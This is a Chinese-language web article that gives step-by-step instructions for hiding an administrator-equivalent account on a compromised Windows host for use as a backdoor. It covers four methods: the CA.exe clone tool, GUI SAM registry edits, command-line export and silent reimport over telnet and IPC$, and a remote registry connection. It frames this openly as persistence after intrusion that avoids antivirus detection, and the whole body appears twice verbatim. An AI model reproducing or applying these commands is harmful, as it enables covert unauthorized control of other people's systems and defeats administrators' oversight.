克隆賬戶(hù)隱藏超級(jí)用戶(hù)創(chuàng)建全接觸
發(fā)布時(shí)間:2011-05-01 01:09:22 作者:佚名
我要評(píng)論

成功入侵達(dá)到目的之后,是不是想再做的點(diǎn)什么?哦!得多留個(gè)心眼,留下個(gè)后門(mén)什么的?可后門(mén)木馬程序容易被查殺,還是創(chuàng)建一個(gè)隱藏的超級(jí)用戶(hù)比較安全,在學(xué)習(xí)借鑒的基礎(chǔ),經(jīng)過(guò)反復(fù)研究實(shí)踐,總結(jié)出了如下如下幾種創(chuàng)建隱藏超級(jí)用戶(hù)的方法。
一、利用帳戶(hù)克隆工具來(lái)創(chuàng)建
Clone Administrator(CA.exe),利用這個(gè)工具可以將Administrator的帳號(hào)克隆為一個(gè)指定的普通帳號(hào)(此普通帳號(hào)必須已經(jīng)存在)??寺〉玫降膸ぬ?hào)具有和系統(tǒng)內(nèi)置的Administrator同樣的設(shè)置,并且用NET命令或者用戶(hù)管理器也發(fā)現(xiàn)不了其權(quán)限已經(jīng)被提升,是一個(gè)不錯(cuò)的ROOT KIT。
現(xiàn)在,我們就來(lái)看看如何利用帳戶(hù)克隆工具在肉雞上創(chuàng)建隱藏的超級(jí)用戶(hù)。
利用流光、SuperScan等進(jìn)行掃描,假設(shè)已經(jīng)掃描到一遠(yuǎn)程主機(jī)的Administrator帳戶(hù),其密碼為123。我們可以使用DameWare Mini Remote Control(簡(jiǎn)稱(chēng)DMRC),在圖形界面(GUI)中來(lái)遠(yuǎn)程控制遠(yuǎn)程主機(jī)。也可以使用OpenTelnet.exe工具來(lái)開(kāi)啟遠(yuǎn)程主機(jī)的TELNET服務(wù),其命令格式為:OpenTelnet.exe \\server username password NTLMAuthor telnetport,使用命令:opentelnet \\192.XX.XX.2 Administrator "123" 0 99,呵呵,沒(méi)想這么成功容易就開(kāi)啟肉雞的TELNET吧!接著使用命令:Telnet 192.XX.XX.2 99,輸入帳戶(hù)及密碼,成功獲取一SHELL。

首先想辦法查看一下有哪些用戶(hù)被細(xì)心的管理員禁止,一般情況下,有些管理員出于安全考慮,通常會(huì)將guest禁用,當(dāng)然也會(huì)禁用其他用戶(hù)。在圖形界面下,非常容易識(shí)別,只要在帳戶(hù)管理器中就可以看到被禁用的帳戶(hù)上有一個(gè)紅叉。但在命令行狀態(tài)下,只能使用命令:“net user 用戶(hù)名”一個(gè)一個(gè)來(lái)查看用戶(hù)是否被禁用。如果懶得這樣麻煩,可自行建立一個(gè)新的帳戶(hù),命令為:“Net user hacker$ youkou /add”,然后使用命令:“Net user hacker$ /active:no”來(lái)停用此帳戶(hù)。

斷開(kāi)與遠(yuǎn)程主機(jī)的連接,用小榕的超級(jí)用戶(hù)克隆程序CA.exe,將被禁用的用戶(hù)hacker$克隆成超級(jí)用戶(hù),命令為:CA.EXE \\192.XX.XX.2 Administrator 123 hacker$ youkou,成功!

這時(shí),hacker$就成為了超級(jí)用戶(hù),并有具有和Administrator同樣的設(shè)置(桌面、菜單等等)。但還是得檢查一下,用CCA.exe,命令如下:cca \\192.XX.XX.2 administrator 123。

看到這一行返回信息沒(méi)有?“[hacker$] AS SAME AS [Administrator]”,說(shuō)明hacker$帳戶(hù)和Administrator相同,克隆成功。
二、圖形界面建隱藏超級(jí)用戶(hù)
恐怕我們最熟悉的就是在圖形界面下進(jìn)行操作了,這對(duì)于在本地計(jì)算機(jī)、3389終端服務(wù)肉雞或使用DMRC等控制的肉雞上創(chuàng)建隱藏超級(jí)用戶(hù) 再好不過(guò)了。
大家知道嗎?Windows 2000中有兩個(gè)注冊(cè)表編輯器:Regedit.exe和Regedt32.exe,Windows XP中Regedit.exe和Regedt32.exe實(shí)為一個(gè)程序,修改鍵值的權(quán)限時(shí)在右鍵快捷菜單中選擇“權(quán)限”來(lái)修改。對(duì)Regedit.exe我想大家都很熟悉,但卻不能對(duì)注冊(cè)表的鍵進(jìn)行權(quán)限設(shè)置,而Regedt32.exe最大的優(yōu)點(diǎn)就是能夠?qū)ψ?cè)表的項(xiàng)鍵設(shè)置權(quán)限。Windows NT/2000/XP的帳戶(hù)信息都在注冊(cè)表的HKEY_LOCAL_MACHINE\SAM\SAM鍵下,但是除了系統(tǒng)用戶(hù)SYSTEM外,其他用戶(hù)都沒(méi)有權(quán)限查看到其中的信息,因此首先得用Regedt32.exe對(duì)“HKEY_LOCAL_MACHINE\SAM\SAM”鍵設(shè)置為“完全控制”權(quán)限。這樣就可以對(duì)SAM鍵內(nèi)的信息進(jìn)行讀寫(xiě)操作。
首先在肉雞中創(chuàng)建一個(gè)新的帳戶(hù)hacker$,可以在帳戶(hù)管理器中建立,也可以使用命令:net user hacker$ 123 /add 來(lái)創(chuàng)建。然后通過(guò)“開(kāi)始”菜單中的“運(yùn)行”,輸入regedt32.exe,點(diǎn)擊“確定”后就打開(kāi)了注冊(cè)表編輯器。依次展開(kāi)子鍵HKEY_LOCAL_MACHINE\SAM\SAM,用鼠標(biāo)右鍵單擊,在彈出的快捷菜單中選擇“權(quán)限”項(xiàng)。

在出現(xiàn)的“SAM 權(quán)限”對(duì)話(huà)窗口中,點(diǎn)擊“添加”將我登錄時(shí)的帳戶(hù)添加到“組或用戶(hù)名稱(chēng)”列表中,這里我是以administrator的身份登錄的,所以我就將administrator加入,在下部的權(quán)限功能區(qū)設(shè)置權(quán)限為“完全控制”。

小提示:最好是添加你登錄的帳戶(hù)或帳戶(hù)所在的組,切莫修改原有的帳戶(hù)或組,否則將會(huì)帶來(lái)一系列不必要的問(wèn)題。等隱藏超級(jí)用戶(hù)建好以后,再來(lái)這里將你添加的帳戶(hù)刪除即可。
如果還是不能展開(kāi)子鍵,請(qǐng)關(guān)閉后重新打開(kāi),如果是Windows 2000的機(jī)器,請(qǐng)關(guān)閉這個(gè)注冊(cè)表編輯器,重新打開(kāi)“regedit.exe”。展開(kāi)子鍵:HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\hacker$,在其右側(cè)窗口中發(fā)現(xiàn)其默認(rèn)值為0x3F1。

下面將hacker$鍵、hacker$對(duì)應(yīng)的項(xiàng)000003F1以及administrator所對(duì)應(yīng)的項(xiàng)000001F4導(dǎo)出為hacker.reg、3EE.reg和1f4.reg,退出注冊(cè)表編輯器。用記事本分別打開(kāi)這幾個(gè)導(dǎo)出的文件進(jìn)行編輯,將超級(jí)用戶(hù)對(duì)應(yīng)的項(xiàng)000001F4下的鍵“F”的值復(fù)制,并覆蓋hacker$對(duì)應(yīng)的項(xiàng)000003EE下的鍵“F”的值,然后將hacker.reg和3EE.reg合并為hacker.reg。 接下來(lái)在命令行下執(zhí)行net user hacker$ /del將用戶(hù)hacker$刪除,最后再將hacker.reg導(dǎo)入注冊(cè)表即可。
現(xiàn)在,隱藏的超級(jí)用戶(hù)hacker$已經(jīng)建好了。打開(kāi)regedt32.exe,把HKEY_LOCAL_MACHINE\SAM\SAM鍵權(quán)限改回原來(lái)的樣子(只要?jiǎng)h除添加的帳戶(hù)administrator即可)。
注意:隱藏的超級(jí)用戶(hù)建好后,就能在帳戶(hù)管理器看不到hacker$這個(gè)用戶(hù),在命令行用“net user”命令也看不到,但是超級(jí)用戶(hù)建立以后,就不能再改密碼了,如果用net user命令來(lái)改hacker$的密碼的話(huà),那么在帳戶(hù)管理器中將又會(huì)看這個(gè)隱藏的超級(jí)用戶(hù)了,而且不能刪除。
三、命令行建立隱藏超級(jí)用戶(hù)
首先通過(guò)使用OpenTelnet.exe工具來(lái)開(kāi)啟遠(yuǎn)程主機(jī)的TELNET服務(wù),然后TELNET遠(yuǎn)程登陸得到一個(gè)shell,創(chuàng)建一個(gè)新的帳戶(hù),命令為:
net user hacker$ youkou /add,然后就來(lái)導(dǎo)出注冊(cè)表項(xiàng)HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users,運(yùn)行命令:
regedit.exe /e hacker.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\,其中/e 是regedit.exe的參數(shù),在HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users這個(gè)鍵的一定要以“\”結(jié)尾。

斷開(kāi)TELNET連接,建立IPC會(huì)話(huà):net use \\192.XX.XX.2\ipc$ "123" /user:"administrator,然后將肉雞上的hacker.reg下載到本機(jī)上用記事本打開(kāi)進(jìn)行編輯命令為:copy \\192.XX.XX.2\D$\hacker.reg,用記事本編輯,將超級(jí)用戶(hù)對(duì)應(yīng)的項(xiàng)000001F4下的鍵“F”的值復(fù)制,并覆蓋hacker$對(duì)應(yīng)的項(xiàng)000003EE下的鍵“F”的值(hacker$對(duì)應(yīng)的項(xiàng)在不同的機(jī)器而不同),編輯好后再上傳:copy hacker.reg \\192.XX.XX.2\D$\hacker1.reg 。
再TELNET到遠(yuǎn)程主機(jī),使用命令net user hacker$ /del刪除hacker$帳戶(hù),然后把hacker.reg導(dǎo)入,命令為:regedit.exe /s hacker.reg,其中參數(shù)/s表示以安靜模式導(dǎo)入。這樣就成功創(chuàng)建了一個(gè)隱藏的超級(jí)用戶(hù)。
四、連接遠(yuǎn)程肉雞注冊(cè)表創(chuàng)建
還有一個(gè)比較簡(jiǎn)單方便的辦法,就是通過(guò)控制臺(tái)以及注冊(cè)表編輯器“文件”菜單中的“連接網(wǎng)絡(luò)注冊(cè)表”功能來(lái)完成隱藏超級(jí)用戶(hù)的創(chuàng)建。
通過(guò)“開(kāi)始”菜單中的“運(yùn)行”,輸入MMC,回車(chē)后即打開(kāi)了控制臺(tái),打開(kāi)“文件”菜單中的“添加/刪除管理單元”(快捷鍵CTRL+M),在出現(xiàn)的對(duì)話(huà)框中點(diǎn)擊“添加”按鈕,在出現(xiàn)的“添加獨(dú)立管理單元”對(duì)話(huà)框中的列表中選擇“本地用戶(hù)和組”。

單擊“添加”即彈出“選擇目標(biāo)機(jī)器”對(duì)話(huà)框,選中“另一臺(tái)計(jì)算機(jī)”,在其后輸入遠(yuǎn)程計(jì)算機(jī)的IP地址,點(diǎn)擊“完成”。

一路關(guān)閉返回至控制臺(tái)窗口,我們就可對(duì)遠(yuǎn)程計(jì)算機(jī)進(jìn)行組和用戶(hù)的管理了,在右側(cè)窗口空白處右擊,在彈出的快捷選擇“新用戶(hù)”建立一帳戶(hù)hacker$吧!
我們知道,regedit.exe、regedt32.exe都有連接網(wǎng)絡(luò)注冊(cè)表的功能,我們可以用regedt32.exe來(lái)為遠(yuǎn)程主機(jī)的注冊(cè)表項(xiàng)設(shè)置權(quán)限,用regedit.exe來(lái)編輯遠(yuǎn)程注冊(cè)表。導(dǎo)出相應(yīng)注冊(cè)項(xiàng),然后進(jìn)行編輯修改(同上面介紹相似)。

現(xiàn)在在“控制臺(tái)”中刪除剛建立的帳戶(hù)hacker$,然后關(guān)閉。然后在注冊(cè)表編輯器中通過(guò)“文件”菜單中的“導(dǎo)入”功能將上面導(dǎo)出的文件導(dǎo)入即可。
如果遠(yuǎn)程主機(jī)沒(méi)有開(kāi)啟遠(yuǎn)程注冊(cè)表服務(wù),請(qǐng)自行開(kāi)啟,因?yàn)槟阋婚_(kāi)始就已經(jīng)擁有其管理員帳戶(hù)密碼。
五、需注意的幾點(diǎn)事項(xiàng)
1、隱藏的超級(jí)用戶(hù)建立以后,在帳戶(hù)管理器中和命令行下均看不到這個(gè)用戶(hù),但這個(gè)用戶(hù)卻存在。
2、隱藏的超級(jí)用戶(hù)建立以后,就不能再修改密碼了,因?yàn)橐坏┬薷拿艽a,這個(gè)隱藏的超級(jí)用戶(hù)就會(huì)暴露在帳戶(hù)管理器中,而且不能刪除。
3、如在本機(jī)上創(chuàng)建隱藏的超級(jí)用戶(hù)時(shí),最好用系統(tǒng)自帶的備份工具先備份好注冊(cè)表。
想不想在電腦上大顯身手?自己動(dòng)手試一試吧!
Clone Administrator(CA.exe),利用這個(gè)工具可以將Administrator的帳號(hào)克隆為一個(gè)指定的普通帳號(hào)(此普通帳號(hào)必須已經(jīng)存在)??寺〉玫降膸ぬ?hào)具有和系統(tǒng)內(nèi)置的Administrator同樣的設(shè)置,并且用NET命令或者用戶(hù)管理器也發(fā)現(xiàn)不了其權(quán)限已經(jīng)被提升,是一個(gè)不錯(cuò)的ROOT KIT。
現(xiàn)在,我們就來(lái)看看如何利用帳戶(hù)克隆工具在肉雞上創(chuàng)建隱藏的超級(jí)用戶(hù)。
利用流光、SuperScan等進(jìn)行掃描,假設(shè)已經(jīng)掃描到一遠(yuǎn)程主機(jī)的Administrator帳戶(hù),其密碼為123。我們可以使用DameWare Mini Remote Control(簡(jiǎn)稱(chēng)DMRC),在圖形界面(GUI)中來(lái)遠(yuǎn)程控制遠(yuǎn)程主機(jī)。也可以使用OpenTelnet.exe工具來(lái)開(kāi)啟遠(yuǎn)程主機(jī)的TELNET服務(wù),其命令格式為:OpenTelnet.exe \\server username password NTLMAuthor telnetport,使用命令:opentelnet \\192.XX.XX.2 Administrator "123" 0 99,呵呵,沒(méi)想這么成功容易就開(kāi)啟肉雞的TELNET吧!接著使用命令:Telnet 192.XX.XX.2 99,輸入帳戶(hù)及密碼,成功獲取一SHELL。

首先想辦法查看一下有哪些用戶(hù)被細(xì)心的管理員禁止,一般情況下,有些管理員出于安全考慮,通常會(huì)將guest禁用,當(dāng)然也會(huì)禁用其他用戶(hù)。在圖形界面下,非常容易識(shí)別,只要在帳戶(hù)管理器中就可以看到被禁用的帳戶(hù)上有一個(gè)紅叉。但在命令行狀態(tài)下,只能使用命令:“net user 用戶(hù)名”一個(gè)一個(gè)來(lái)查看用戶(hù)是否被禁用。如果懶得這樣麻煩,可自行建立一個(gè)新的帳戶(hù),命令為:“Net user hacker$ youkou /add”,然后使用命令:“Net user hacker$ /active:no”來(lái)停用此帳戶(hù)。

斷開(kāi)與遠(yuǎn)程主機(jī)的連接,用小榕的超級(jí)用戶(hù)克隆程序CA.exe,將被禁用的用戶(hù)hacker$克隆成超級(jí)用戶(hù),命令為:CA.EXE \\192.XX.XX.2 Administrator 123 hacker$ youkou,成功!

這時(shí),hacker$就成為了超級(jí)用戶(hù),并有具有和Administrator同樣的設(shè)置(桌面、菜單等等)。但還是得檢查一下,用CCA.exe,命令如下:cca \\192.XX.XX.2 administrator 123。

看到這一行返回信息沒(méi)有?“[hacker$] AS SAME AS [Administrator]”,說(shuō)明hacker$帳戶(hù)和Administrator相同,克隆成功。
二、圖形界面建隱藏超級(jí)用戶(hù)
恐怕我們最熟悉的就是在圖形界面下進(jìn)行操作了,這對(duì)于在本地計(jì)算機(jī)、3389終端服務(wù)肉雞或使用DMRC等控制的肉雞上創(chuàng)建隱藏超級(jí)用戶(hù) 再好不過(guò)了。
大家知道嗎?Windows 2000中有兩個(gè)注冊(cè)表編輯器:Regedit.exe和Regedt32.exe,Windows XP中Regedit.exe和Regedt32.exe實(shí)為一個(gè)程序,修改鍵值的權(quán)限時(shí)在右鍵快捷菜單中選擇“權(quán)限”來(lái)修改。對(duì)Regedit.exe我想大家都很熟悉,但卻不能對(duì)注冊(cè)表的鍵進(jìn)行權(quán)限設(shè)置,而Regedt32.exe最大的優(yōu)點(diǎn)就是能夠?qū)ψ?cè)表的項(xiàng)鍵設(shè)置權(quán)限。Windows NT/2000/XP的帳戶(hù)信息都在注冊(cè)表的HKEY_LOCAL_MACHINE\SAM\SAM鍵下,但是除了系統(tǒng)用戶(hù)SYSTEM外,其他用戶(hù)都沒(méi)有權(quán)限查看到其中的信息,因此首先得用Regedt32.exe對(duì)“HKEY_LOCAL_MACHINE\SAM\SAM”鍵設(shè)置為“完全控制”權(quán)限。這樣就可以對(duì)SAM鍵內(nèi)的信息進(jìn)行讀寫(xiě)操作。
首先在肉雞中創(chuàng)建一個(gè)新的帳戶(hù)hacker$,可以在帳戶(hù)管理器中建立,也可以使用命令:net user hacker$ 123 /add 來(lái)創(chuàng)建。然后通過(guò)“開(kāi)始”菜單中的“運(yùn)行”,輸入regedt32.exe,點(diǎn)擊“確定”后就打開(kāi)了注冊(cè)表編輯器。依次展開(kāi)子鍵HKEY_LOCAL_MACHINE\SAM\SAM,用鼠標(biāo)右鍵單擊,在彈出的快捷菜單中選擇“權(quán)限”項(xiàng)。

在出現(xiàn)的“SAM 權(quán)限”對(duì)話(huà)窗口中,點(diǎn)擊“添加”將我登錄時(shí)的帳戶(hù)添加到“組或用戶(hù)名稱(chēng)”列表中,這里我是以administrator的身份登錄的,所以我就將administrator加入,在下部的權(quán)限功能區(qū)設(shè)置權(quán)限為“完全控制”。

小提示:最好是添加你登錄的帳戶(hù)或帳戶(hù)所在的組,切莫修改原有的帳戶(hù)或組,否則將會(huì)帶來(lái)一系列不必要的問(wèn)題。等隱藏超級(jí)用戶(hù)建好以后,再來(lái)這里將你添加的帳戶(hù)刪除即可。
如果還是不能展開(kāi)子鍵,請(qǐng)關(guān)閉后重新打開(kāi),如果是Windows 2000的機(jī)器,請(qǐng)關(guān)閉這個(gè)注冊(cè)表編輯器,重新打開(kāi)“regedit.exe”。展開(kāi)子鍵:HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\hacker$,在其右側(cè)窗口中發(fā)現(xiàn)其默認(rèn)值為0x3F1。

下面將hacker$鍵、hacker$對(duì)應(yīng)的項(xiàng)000003F1以及administrator所對(duì)應(yīng)的項(xiàng)000001F4導(dǎo)出為hacker.reg、3EE.reg和1f4.reg,退出注冊(cè)表編輯器。用記事本分別打開(kāi)這幾個(gè)導(dǎo)出的文件進(jìn)行編輯,將超級(jí)用戶(hù)對(duì)應(yīng)的項(xiàng)000001F4下的鍵“F”的值復(fù)制,并覆蓋hacker$對(duì)應(yīng)的項(xiàng)000003EE下的鍵“F”的值,然后將hacker.reg和3EE.reg合并為hacker.reg。 接下來(lái)在命令行下執(zhí)行net user hacker$ /del將用戶(hù)hacker$刪除,最后再將hacker.reg導(dǎo)入注冊(cè)表即可。
現(xiàn)在,隱藏的超級(jí)用戶(hù)hacker$已經(jīng)建好了。打開(kāi)regedt32.exe,把HKEY_LOCAL_MACHINE\SAM\SAM鍵權(quán)限改回原來(lái)的樣子(只要?jiǎng)h除添加的帳戶(hù)administrator即可)。
注意:隱藏的超級(jí)用戶(hù)建好后,就能在帳戶(hù)管理器看不到hacker$這個(gè)用戶(hù),在命令行用“net user”命令也看不到,但是超級(jí)用戶(hù)建立以后,就不能再改密碼了,如果用net user命令來(lái)改hacker$的密碼的話(huà),那么在帳戶(hù)管理器中將又會(huì)看這個(gè)隱藏的超級(jí)用戶(hù)了,而且不能刪除。
三、命令行建立隱藏超級(jí)用戶(hù)
首先通過(guò)使用OpenTelnet.exe工具來(lái)開(kāi)啟遠(yuǎn)程主機(jī)的TELNET服務(wù),然后TELNET遠(yuǎn)程登陸得到一個(gè)shell,創(chuàng)建一個(gè)新的帳戶(hù),命令為:
net user hacker$ youkou /add,然后就來(lái)導(dǎo)出注冊(cè)表項(xiàng)HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users,運(yùn)行命令:
regedit.exe /e hacker.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\,其中/e 是regedit.exe的參數(shù),在HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users這個(gè)鍵的一定要以“\”結(jié)尾。

斷開(kāi)TELNET連接,建立IPC會(huì)話(huà):net use \\192.XX.XX.2\ipc$ "123" /user:"administrator,然后將肉雞上的hacker.reg下載到本機(jī)上用記事本打開(kāi)進(jìn)行編輯命令為:copy \\192.XX.XX.2\D$\hacker.reg,用記事本編輯,將超級(jí)用戶(hù)對(duì)應(yīng)的項(xiàng)000001F4下的鍵“F”的值復(fù)制,并覆蓋hacker$對(duì)應(yīng)的項(xiàng)000003EE下的鍵“F”的值(hacker$對(duì)應(yīng)的項(xiàng)在不同的機(jī)器而不同),編輯好后再上傳:copy hacker.reg \\192.XX.XX.2\D$\hacker1.reg 。
再TELNET到遠(yuǎn)程主機(jī),使用命令net user hacker$ /del刪除hacker$帳戶(hù),然后把hacker.reg導(dǎo)入,命令為:regedit.exe /s hacker.reg,其中參數(shù)/s表示以安靜模式導(dǎo)入。這樣就成功創(chuàng)建了一個(gè)隱藏的超級(jí)用戶(hù)。
四、連接遠(yuǎn)程肉雞注冊(cè)表創(chuàng)建
還有一個(gè)比較簡(jiǎn)單方便的辦法,就是通過(guò)控制臺(tái)以及注冊(cè)表編輯器“文件”菜單中的“連接網(wǎng)絡(luò)注冊(cè)表”功能來(lái)完成隱藏超級(jí)用戶(hù)的創(chuàng)建。
通過(guò)“開(kāi)始”菜單中的“運(yùn)行”,輸入MMC,回車(chē)后即打開(kāi)了控制臺(tái),打開(kāi)“文件”菜單中的“添加/刪除管理單元”(快捷鍵CTRL+M),在出現(xiàn)的對(duì)話(huà)框中點(diǎn)擊“添加”按鈕,在出現(xiàn)的“添加獨(dú)立管理單元”對(duì)話(huà)框中的列表中選擇“本地用戶(hù)和組”。

單擊“添加”即彈出“選擇目標(biāo)機(jī)器”對(duì)話(huà)框,選中“另一臺(tái)計(jì)算機(jī)”,在其后輸入遠(yuǎn)程計(jì)算機(jī)的IP地址,點(diǎn)擊“完成”。

一路關(guān)閉返回至控制臺(tái)窗口,我們就可對(duì)遠(yuǎn)程計(jì)算機(jī)進(jìn)行組和用戶(hù)的管理了,在右側(cè)窗口空白處右擊,在彈出的快捷選擇“新用戶(hù)”建立一帳戶(hù)hacker$吧!
我們知道,regedit.exe、regedt32.exe都有連接網(wǎng)絡(luò)注冊(cè)表的功能,我們可以用regedt32.exe來(lái)為遠(yuǎn)程主機(jī)的注冊(cè)表項(xiàng)設(shè)置權(quán)限,用regedit.exe來(lái)編輯遠(yuǎn)程注冊(cè)表。導(dǎo)出相應(yīng)注冊(cè)項(xiàng),然后進(jìn)行編輯修改(同上面介紹相似)。

現(xiàn)在在“控制臺(tái)”中刪除剛建立的帳戶(hù)hacker$,然后關(guān)閉。然后在注冊(cè)表編輯器中通過(guò)“文件”菜單中的“導(dǎo)入”功能將上面導(dǎo)出的文件導(dǎo)入即可。
如果遠(yuǎn)程主機(jī)沒(méi)有開(kāi)啟遠(yuǎn)程注冊(cè)表服務(wù),請(qǐng)自行開(kāi)啟,因?yàn)槟阋婚_(kāi)始就已經(jīng)擁有其管理員帳戶(hù)密碼。
五、需注意的幾點(diǎn)事項(xiàng)
1、隱藏的超級(jí)用戶(hù)建立以后,在帳戶(hù)管理器中和命令行下均看不到這個(gè)用戶(hù),但這個(gè)用戶(hù)卻存在。
2、隱藏的超級(jí)用戶(hù)建立以后,就不能再修改密碼了,因?yàn)橐坏┬薷拿艽a,這個(gè)隱藏的超級(jí)用戶(hù)就會(huì)暴露在帳戶(hù)管理器中,而且不能刪除。
3、如在本機(jī)上創(chuàng)建隱藏的超級(jí)用戶(hù)時(shí),最好用系統(tǒng)自帶的備份工具先備份好注冊(cè)表。
想不想在電腦上大顯身手?自己動(dòng)手試一試吧!
相關(guān)文章
什么是CC攻擊 判斷網(wǎng)站是否被CC攻擊并且如何防御CC攻擊
CC主要是用來(lái)攻擊頁(yè)面的,大家都有這樣的經(jīng)歷,就是在訪(fǎng)問(wèn)論壇時(shí),如果這個(gè)論壇比較大,訪(fǎng)問(wèn)的人比較多,打開(kāi)頁(yè)面的速度會(huì)比較慢,對(duì)不?!一般來(lái)說(shuō),訪(fǎng)問(wèn)的人越多,論壇的頁(yè)2024-01-06Windows系統(tǒng)安全風(fēng)險(xiǎn)-本地NTLM重放提權(quán)
入侵者主要通過(guò)Potato程序攻擊擁有SYSTEM權(quán)限的端口偽造網(wǎng)絡(luò)身份認(rèn)證過(guò)程,利用NTLM重放機(jī)制騙取SYSTEM身份令牌,最終取得系統(tǒng)權(quán)限,該安全風(fēng)險(xiǎn)微軟并不認(rèn)為存在漏洞,所以2021-04-15- 這篇文章主要介紹了文件上傳漏洞全面滲透分析小結(jié),這里主要為大家分享一下防御方法,需要的朋友可以參考下2021-03-21
- 這篇文章主要介紹了sql手工注入語(yǔ)句&SQL手工注入大全,需要的朋友可以參考下2017-09-06
- 這篇文章主要介紹了詳解Filezilla server 提權(quán),需要的朋友可以參考下2017-05-13
FileZilla Server 2008 x64 提權(quán)與防御方法
這篇文章主要介紹了FileZilla Server 2008 x64 提權(quán)與防御方法,需要的朋友可以參考下2017-05-13https加密也被破解 HEIST攻擊從加密數(shù)據(jù)獲取明文
不久之前我們說(shuō)過(guò)關(guān)于http和https的區(qū)別,對(duì)于加密的https,我們一直認(rèn)為它是相對(duì)安全的,可今天要講的是,一種繞過(guò)HTTPS加密得到明文信息的web攻擊方式,不知道這消息對(duì)你2016-08-10iPhone和Mac也會(huì)被黑 一條iMessage密碼可能就被盜了
一直以來(lái)蘋(píng)果系統(tǒng)的安全性都是比安卓要高的,但是再安全的系統(tǒng)也免不了漏洞,蘋(píng)果也一樣。最近爆出的新漏洞,只需要接收一條多媒體信息或者iMessage就會(huì)導(dǎo)致用戶(hù)信息泄露。2016-07-27- 國(guó)家正在修正關(guān)于黑客方面的法律法規(guī),有一條震驚黑客圈的“世紀(jì)佳緣”起訴白帽黑客事件,深深的傷害了廣大黑客們的心,加上扎克伯格和特拉維斯·卡蘭尼克賬號(hào)被盜,于是黑2016-07-11
如何逆向破解HawkEye keylogger鍵盤(pán)記錄器進(jìn)入攻擊者郵箱
面對(duì)惡意郵件攻擊,我們就只能默默忍受被他攻擊,連自我保護(hù)能力都沒(méi)有談什么反抗?讓人痛快的是,如今有了解決辦法,逆向破解鍵盤(pán)記錄器,進(jìn)入攻擊者郵箱2016-07-06